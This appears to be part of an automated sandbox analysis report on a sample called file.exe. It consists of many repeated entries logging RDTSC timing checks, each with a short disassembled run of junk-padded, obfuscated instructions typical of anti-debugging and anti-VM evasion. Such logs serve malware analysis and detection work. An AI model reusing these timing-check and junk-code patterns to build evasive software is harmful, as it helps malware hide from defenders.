Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 743665 second address: 743676 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8BD3 second address: 7B8BE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9150 second address: 7B9154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9154 second address: 7B915E instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B915E second address: 7B9199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C2h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F28C47EE2C8h 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9199 second address: 7B919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B919F second address: 7B91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B91A3 second address: 7B91A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B91A7 second address: 7B91AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BAE8D second address: 7BAE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F28C4758076h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BAE9A second address: 7BAECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C1h 0x00000008 jnc 00007F28C47EE2B6h 0x0000000e jmp 00007F28C47EE2C4h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C13AE second address: 7C13B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0354 second address: 7C0359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0359 second address: 7C0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0366 second address: 7C0389 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F28C47EE2D1h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F28C47EE2BDh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0389 second address: 7C038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1065 second address: 7C107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2BEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C107E second address: 7C1082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1082 second address: 7C1093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jnc 00007F28C47EE2B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1093 second address: 7C1099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5A87 second address: 7C5A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 789AEF second address: 789B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D25E0h], ebx 0x00000010 lea eax, dword ptr [ebp+1247D8A7h] 0x00000016 sub dword ptr [ebp+122D194Fh], ebx 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 789B12 second address: 789B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A02C second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+1244E86Dh], ebx 0x0000000d push dword ptr [ebp+122D0C41h] 0x00000013 mov dword ptr [ebp+122D186Eh], edx 0x00000019 call dword ptr [ebp+122D35E5h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jmp 00007F28C4758089h 0x00000026 mov bx, di 0x00000029 popad 0x0000002a clc 0x0000002b xor eax, eax 0x0000002d cmc 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 mov dword ptr [ebp+122D2E76h], eax 0x00000038 mov dword ptr [ebp+122D27C6h], eax 0x0000003e stc 0x0000003f mov esi, 0000003Ch 0x00000044 jnl 00007F28C475808Dh 0x0000004a add esi, dword ptr [esp+24h] 0x0000004e pushad 0x0000004f sub bh, 00000056h 0x00000052 sub dword ptr [ebp+122D2E76h], ebx 0x00000058 popad 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2E76h], ecx 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 clc 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jmp 00007F28C4758085h 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F28C4758080h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A099 second address: 78A09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A09E second address: 78A0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0A8 second address: 78A0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0B9 second address: 78A0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0C3 second address: 78A0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0C7 second address: 78A0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A0D8 second address: 78A0FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C2h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A282 second address: 78A2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A2A1 second address: 78A2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A7F2 second address: 78A7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACBA second address: 78ACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACBE second address: 78ACD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78ACD0 second address: 78AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F28C47EE2B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D2A32h] 0x00000027 lea eax, dword ptr [ebp+1247D8EBh] 0x0000002d sub cl, FFFFFFD2h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD1B second address: 78AD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F28C475807Fh 0x00000012 lea eax, dword ptr [ebp+1247D8A7h] 0x00000018 or edi, 771395A7h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 je 00007F28C4758076h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD4E second address: 78AD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AD68 second address: 772A12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F28C4758078h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 call dword ptr [ebp+1244C8B5h] 0x0000002b push eax 0x0000002c jne 00007F28C475808Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 772A12 second address: 772A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4E52 second address: 7C4E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758081h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F28C475807Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C5326 second address: 7C5335 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C55A3 second address: 7C55C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F28C4758081h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F28C4758076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C55C5 second address: 7C55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB79E second address: 7CB7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758088h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA1B3 second address: 7CA1C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA1C9 second address: 7CA1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CA346 second address: 7CA34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAC84 second address: 7CAC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C4758082h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAC9E second address: 7CACF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C5h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 jmp 00007F28C47EE2C5h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F28C47EE2BEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CACF6 second address: 7CAD1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F28C4758086h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAE95 second address: 7CAE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAE9B second address: 7CAEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAEA3 second address: 7CAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CAEBD second address: 7CAED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F28C475807Dh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB62B second address: 7CB657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F28C47EE2BFh 0x0000000b pop esi 0x0000000c jmp 00007F28C47EE2C3h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9ED8 second address: 7C9EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F28C475807Ah 0x0000000f jmp 00007F28C4758080h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC18 second address: 7CFC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC1E second address: 7CFC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFC27 second address: 7CFC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D48ED second address: 7D48F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7739 second address: 7D7741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7741 second address: 7D7764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jno 00007F28C4758076h 0x0000000c jmp 00007F28C4758086h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D7764 second address: 7D7774 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C47EE2C2h 0x00000008 jnl 00007F28C47EE2B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB7BB second address: 7DB7C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB7C0 second address: 7DB817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C47EE2BEh 0x0000000b popad 0x0000000c jmp 00007F28C47EE2C6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F28C47EE2C3h 0x00000019 jmp 00007F28C47EE2BCh 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F28C47EE2B6h 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB817 second address: 7DB81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBBE second address: 7DEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F28C47EE2B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBC9 second address: 7DEBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758082h 0x00000008 jmp 00007F28C475807Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEBF3 second address: 7DEBF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEF2A second address: 7DEF58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758080h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F28C475807Ch 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 jbe 00007F28C475807Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEF58 second address: 7DEF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DF314 second address: 7DF318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DF318 second address: 7DF31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1EF7 second address: 7E1F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E205F second address: 7E2063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8520 second address: 7E8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8526 second address: 7E852C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F4B second address: 7E6F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F51 second address: 7E6F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E6F5C second address: 7E6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E70A0 second address: 7E70A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E725E second address: 7E7269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7269 second address: 7E7270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73CA second address: 7E73CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73CF second address: 7E73D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E73D5 second address: 7E73DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E76F2 second address: 7E7703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F28C47EE2B6h 0x0000000a jng 00007F28C47EE2B6h 0x00000010 popad 0x00000011 rdtsc
